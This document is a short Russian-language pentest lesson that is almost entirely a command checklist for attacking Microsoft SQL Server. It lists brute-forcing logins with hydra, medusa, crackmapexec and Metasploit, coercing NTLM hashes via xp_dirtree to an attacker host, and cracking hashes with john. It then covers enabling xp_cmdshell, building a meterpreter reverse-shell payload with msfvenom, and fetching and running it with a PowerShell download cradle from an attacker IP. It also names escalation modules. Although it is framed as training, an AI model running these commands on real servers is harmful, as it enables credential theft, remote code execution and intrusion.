В этом уроке мы рассмотрим пентест Microsoft SQL Server.
Чек-лист к данному занятию:
#обучение
#AD
#pentest
#mssql
#xp_dirtree
#xp_cmdshell
#coercing
Чек-лист к данному занятию:
nmap --script ms-sql-info,ms-sql-ntlm-info -sT -sV -p 445,1433 192.168.1.3
crackmapexec mssql <IP> -d <Имя домена> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host>
msf> use auxiliary/scanner/mssql/mssql_login
mssqlclient.py -windows-auth [email protected]
sql> select IS_SRVROLEMEMBER ('sysadmin');
sql> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
msf> use auxiliary/admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_sql_logins
responder -I eth0 -v
sql> use master; exec xp_dirtree '\\<KALI_IP>\share';--
john --wordlist=/usr/share/wordlists/rockyou.txt mssql-svc.hash
sql> SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM sys.configurations WHERE name = 'xp_cmdshell';
sql> EXEC sp_configure 'show advanced options',1;
sql> RECONFIGURE;
sql> EXEC sp_configure 'xp_cmdshell',1;
sql> RECONFIGURE;
sql> xp_cmdshell "echo (Get-Service windefend).Status | powershell"
sql> xp_cmdshell "echo Get-MpComputerStatus | powershell -noprofile"
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 VERBOSE=true -f psh -o meterpreter.ps1
sql> EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString(''[http://192.168.1.5:80/meterpreter.ps1](http://192.168.1.5/meterpreter.ps1)'')"'
msf> use exploit/windows/mssql/mssql_payload
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as
msf> use admin/mssql/mssql_escalate_dbowner
msf> use windows/manage/mssql_local_auth_bypass
#обучение
#AD
#pentest
#mssql
#xp_dirtree
#xp_cmdshell
#coercing